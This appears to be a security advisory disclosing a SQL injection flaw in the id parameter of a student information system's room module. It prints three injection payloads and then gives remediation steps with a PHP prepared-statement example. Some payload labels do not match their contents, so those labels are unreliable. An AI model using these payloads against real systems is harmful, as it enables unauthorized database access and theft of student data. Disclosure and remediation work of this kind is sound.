Critical Vulnerability Information

Affected Product: Student Information Management System
Vulnerable File: /admin/modules/room/index.php
Version: V1.0
Vulnerability Type: SQL Injection

Root Cause

Due to insufficient validation of the user-supplied parameter, attackers can inject malicious SQL code and execute it directly within SQL queries, leading to unauthorized operations.

Impact

Attackers can exploit this SQL injection vulnerability to gain unauthorized database access, exfiltrate sensitive data, modify data, achieve full system control, or even cause service disruption, posing a severe threat to system security and business continuity.

Description

During a security review of the Student Information Management System, a critical SQL injection vulnerability was discovered in the file /admin/modules/room/index.php. Due to inadequate input validation for the parameter, attackers can inject malicious SQL queries. As a result, attackers may gain unauthorized access to the database, alter data, and retrieve sensitive information. Immediate remediation is required to ensure system security and protect data integrity.

Vulnerability Details and POC

Vulnerability Alias: id parameter

Payload Examples

Parameter: id (GET)

Type: Boolean-based blind injection - Parameter replacement {original_value}
Payload: admin' AND (SELECT 6293 FROM(SELECT COUNT(*),CONCAT(0x716a6a7171,(SELECT (ELT(6293=6293,1))),0x716a6a7171,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a) AND '1'='1

Type: Time-based blind injection (using SLEEP)
Payload: admin' AND (SELECT CASE WHEN (9921=9921) THEN SLEEP(5) ELSE (SELECT 8423) END)--

Type: Generic UNION query (NULL) - 8 columns
Payload: ViewRoomSlot=-1 UNION ALL SELECT NULL,NULL,CONCAT(0x716b766171,(SELECT (ELT(8423=8423,1))),0x716b766171),NULL,NULL,NULL,NULL,NULL,NULL--

Recommended Remediation

1. Use prepared statements with parameter binding.
2. Implement input validation and filtering.
3. Minimize database user privileges.
4. Conduct regular security audits.
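
The first two remediation items combined, as an added example that is not taken from the application's source: allow-list validation of a numeric id followed by a bound prepared statement. The `room` table, its columns, and the function names `demoDb`, `parseRoomId` and `findRoom` are assumptions, and an in-memory SQLite database with constructed rows stands in for the real one so the script runs offline.

```php
<?php
// Added example: hypothetical schema and function names, not the application's code.
declare(strict_types=1);

// In-memory SQLite stands in for the application's database (constructed rows).
function demoDb(): PDO {
    $pdo = new PDO('sqlite::memory:');
    $pdo->setAttribute(PDO::ATTR_ERRMODE, PDO::ERRMODE_EXCEPTION);
    $pdo->exec('CREATE TABLE room (id INTEGER PRIMARY KEY, name TEXT)');
    $pdo->exec("INSERT INTO room (id, name) VALUES (1, 'A-101'), (2, 'B-202')");
    return $pdo;
}

// Remediation item 2: allow-list validation. A room id must be a positive integer.
function parseRoomId($raw): ?int {
    if (!is_string($raw)) {
        return null; // rejects array input such as ?id[]=1
    }
    $id = filter_var($raw, FILTER_VALIDATE_INT, ['options' => ['min_range' => 1]]);
    return $id === false ? null : $id;
}

// Remediation item 1: prepared statement. The value is bound as an integer
// and is never concatenated into the SQL text.
function findRoom(PDO $pdo, $raw): ?array {
    $id = parseRoomId($raw);
    if ($id === null) {
        return null;
    }
    $stmt = $pdo->prepare('SELECT id, name FROM room WHERE id = :id');
    $stmt->bindValue(':id', $id, PDO::PARAM_INT);
    $stmt->execute();
    $row = $stmt->fetch(PDO::FETCH_ASSOC);
    return $row === false ? null : $row;
}

// Valid ids resolve to a row; quote-bearing, UNION-style and array inputs do not.
$pdo = demoDb();
foreach (['1', '2', "1' AND '1'='1", '-1 UNION ALL SELECT NULL', ['1']] as $input) {
    $row = findRoom($pdo, $input);
    echo json_encode($input), ' => ', $row ? $row['name'] : 'rejected or not found', PHP_EOL;
}
```

With PDO's MySQL driver, also set `PDO::ATTR_EMULATE_PREPARES` to `false` so that parameters are bound by the server rather than interpolated client-side.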